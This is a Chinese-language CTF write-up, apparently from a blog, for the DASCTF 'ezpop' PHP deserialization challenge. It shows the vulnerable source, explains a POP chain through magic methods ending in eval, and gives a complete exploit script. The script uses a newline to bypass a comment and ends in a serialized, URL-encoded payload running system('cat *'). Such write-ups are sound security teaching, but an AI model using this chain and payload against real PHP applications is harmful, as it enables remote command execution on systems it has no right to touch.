[DASCTF]ezpop-WP

发表于
更新于
1

贴上源码

<?php
​
class crow
{
    public $v1;
    public $v2;
​
    function eval() {
        echo new $this->v1($this->v2);
    }
​
    public function __invoke()
    {
        $this->v1->world();
    }
}
​
class fin
{
    public $f1;
​
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }
​
    public function run()
    {
        ($this->f1)();
    }
​
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }
​
}
​
class what
{
    public $a;
​
    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;
​
    public function run()
    {
        ($this->m1)();
    }
​
    public function get_flag()
    {
        eval('#' . $this->m1);
    }
​
}
​
if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}
?>

一道反序列化的题目,先审查一下代码,然后写pop链

fin类中__destruct析构,当类被销毁时自动执行,从这里开始。

__destruct方法下有echo输出字符串可以调用what类中的__tostring魔术方法,__tostring下的调用run()函数有两个类可用,我选择mix类。mix类中的run()函数($this->m1)();使用函数的方式调用变量,触发crow类的__invoke魔术方法,在__invoke魔术方法中调用不存在的world()函数,触发fin类中的__call魔术方法,然后调用mix类的get_flag()函数进行命令执行。

需要注意get_flag()函数中的eval('#' . $this->m1);含有#注释符,可用\n换行符绕过

exp如下

<?php
​
class crow
{
    public $v1;
    public $v2;
​
    function eval() {
        echo new $this->v1($this->v2);
    }
​
    public function __invoke()
    {
        $this->v1->world();
    }
}
​
class fin
{
    public $f1;
​
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }
​
    public function run()
    {
        ($this->f1)();
    }
​
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }
​
}
​
class what
{
    public $a;
​
    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;
​
    public function run()
    {
        ($this->m1)();
    }
​
    public function get_flag()
    {
        eval('#' . $this->m1);
    }
​
}
​
$fin1=new fin();
$what=new what();
$mix1=new mix();
$mix2=new mix();
$crow=new crow();
$fin2=new fin();
$fin1->f1=$what;
$what->a=$mix1;
$mix1->m1=$crow;
$crow->v1=$fin2;
$fin2->f1=$mix2;
$mix2->m1="\nsystem('cat *');";
​
echo urlencode(serialize($fin1));
​
?>

得到

O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3BO%3A4%3A%22crow%22%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A17%3A%22%0Asystem%28%27cat+%2A%27%29%3B%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7Dhello114514

使用BP发包,可以得到flag


0
上一篇 [电信互联网行业竞赛]bestphp
下一篇 [2022DASCTF APR X]soeasy_php